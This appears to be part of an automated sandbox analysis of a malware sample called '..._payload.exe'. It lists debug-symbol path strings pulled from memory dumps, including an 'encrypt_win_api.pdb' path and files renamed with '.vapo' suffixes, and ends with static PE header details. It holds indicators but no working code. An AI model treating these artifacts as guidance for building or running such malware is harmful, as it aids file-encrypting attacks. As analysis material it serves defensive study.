Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ije source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268917126.0000000003D24000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270401178.00000000041F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tate\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\& source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.vapogi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272250525.00000000042F2000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\Q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\320\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279197442.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280968571.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\OH\| source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244648233.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\a\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281481363.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280272665.00000000041F3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\' source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408907975188232.txt\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y.IE5\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281570328.000000000429E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Pg source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004503000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*d source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\% source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\Nn< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrogFile_October_3_2023__13_9_20.txtpol source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282207150.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305914874.000000000415F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\2E source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246554838.0000000003D07000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245102965.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245433373.0000000003D01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\\\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\#8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
